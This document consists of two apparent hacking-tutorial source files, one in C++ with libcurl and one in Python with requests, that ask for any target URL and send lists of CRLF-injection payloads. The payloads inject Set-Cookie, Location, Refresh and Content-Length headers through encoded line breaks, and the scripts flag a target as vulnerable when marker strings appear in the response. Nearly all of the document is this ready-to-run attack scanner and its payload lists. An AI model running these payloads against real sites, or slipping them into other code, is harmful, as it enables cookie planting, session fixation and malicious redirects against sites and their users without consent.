File: hacking_with_c++/clrf_injection/clrf_injection.cpp
#include <iostream>
#include <vector>
#include <string>
#include <curl/curl.h>

using namespace std;

// Callback function to handle HTTP response
size_t writeCallback(char* ptr, size_t size, size_t nmemb, string* data) {
    data->append(ptr, size * nmemb);
    return size * nmemb;
}

// Function to test for vulnerabilities
void testCRLFInjection(const string& payload, const string& targetURL) {
    CURL* curl = curl_easy_init();
    if (curl) {
        // Set URL
        curl_easy_setopt(curl, CURLOPT_URL, targetURL.c_str());

        // Set payload data
        curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload.c_str());

        // Response data
        string response_data;

        // Set response data handler
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writeCallback);
        curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response_data);

        // Perform the request
        CURLcode res = curl_easy_perform(curl);

        if (res == CURLE_OK) {
            if (response_data.find("maliciousCookie=maliciousValue") != string::npos ||
                response_data.find("Refresh: 0") != string::npos ||
                response_data.find("Content-Length: 0") != string::npos ||
                response_data.find("Location: https://www.bbc.com") != string::npos) {
                cout << "Vulnerable to CRLF Injection: " << payload << endl;
            } else {
                cout << "Not vulnerable to CRLF Injection: " << payload << endl;
            }
        } else {
            cerr << "Error performing request: " << curl_easy_strerror(res) << endl;
        }

        // Clean up
        curl_easy_cleanup(curl);
    } else {
        cerr << "Failed to initialize libcurl" << endl;
    }
}

int main() {
    // Prompt for the target URL
    cout << "Enter your target URL: ";
    string targetURL;
    getline(cin, targetURL);

    // Craft payloads with various CRLF injection techniques
    vector<string> payloads = {
    // CRLF injection in Host header
    "Host: example.com%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Accept header
    "Accept: text/html%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Accept-Language header
    "Accept-Language: en-US%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Accept-Encoding header
    "Accept-Encoding: gzip, deflate%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Connection header
    "Connection: close%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Cache-Control header
    "Cache-Control: no-cache%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Content-Type header
    "Content-Type: application/x-www-form-urlencoded%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Content-Encoding header
    "Content-Encoding: gzip%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Content-Disposition header
    "Content-Disposition: attachment; filename=test.txt%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Content-Language header
    "Content-Language: en%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A",

    // CRLF injection in Content-Location header
    "Content-Location: /index.html%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A"
};


    // Initialize libcurl
    curl_global_init(CURL_GLOBAL_ALL);

    // Loop through payloads and test for vulnerabilities
    for (const string& payload : payloads) {
        testCRLFInjection(payload, targetURL);
    }

    // Cleanup libcurl
    curl_global_cleanup();

    return 0;
}

File: hacking_with_python/clrf_injection.py
import requests

# Prompt for the target URL
TARGET_URL = input("Enter your target URL: ")

# Craft payloads with various CRLF injection techniques
PAYLOADS = [
    # CRLF injection in Set-Cookie header
    "username=test%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A&password=test",

    # CRLF injection in Content-Length header
    "username=test%0D%0AContent-Length:%200%0D%0A&password=test",

    # CRLF injection in Refresh header
    "username=test%0D%0ARefresh:%200%0D%0A&password=test",

    # CRLF injection in Location header
    "username=test%0D%0ALocation:%20https://www.bbc.com%0D%0A&password=test",

    # CRLF injection in User-Agent header
    "User-Agent:%20Malicious%0D%0Ausername=test&password=test",

    # CRLF injection in Referer header
    "Referer:%20https://www.bbc.com%0D%0Ausername=test&password=test",

    # CRLF injection in Proxy header
    "Proxy:%20https://www.bbc.com%0D%0Ausername=test&password=test",

    # CRLF injection in Set-Cookie2 header
    "Set-Cookie2:%20maliciousCookie=maliciousValue%0D%0Ausername=test&password=test",

    # CRLF injection in any other custom header
    "CustomHeader:%20Injection%0D%0Ausername=test&password=test",

    # CRLF injection in HTTP request method
    "POST /login%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A HTTP/1.1%0D%0AHost: example.com%0D%0AContent-Length: 0%0D%0A%0D%0A",

    # CRLF injection in HTTP version
    "POST /login HTTP/1.1%0D%0AHost: example.com%0D%0AContent-Length: 0%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A%0D%0A",

    # CRLF injection in MIME types
    "Content-Type: text/html%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A%0D%0Ausername=test&password=test",

    # CRLF injection in HTML comment
    "<!--%0D%0ASet-Cookie:%20maliciousCookie=maliciousValue%0D%0A-->"
]

# Testing function to send requests and check responses
def test_crlf_injection(payload):
    response = requests.post(TARGET_URL, data=payload)
    if "maliciousCookie=maliciousValue" in response.text or \
            "Refresh: 0" in response.text or \
            "Content-Length: 0" in response.text or \
            "Location: https://www.bbc.com" in response.text:
        print(f"Vulnerable to CRLF Injection: {payload}")
    else:
        print(f"Not vulnerable to CRLF Injection: {payload}")

# Loop through payloads and test for vulnerabilities
for payload in PAYLOADS:
    test_crlf_injection(payload)
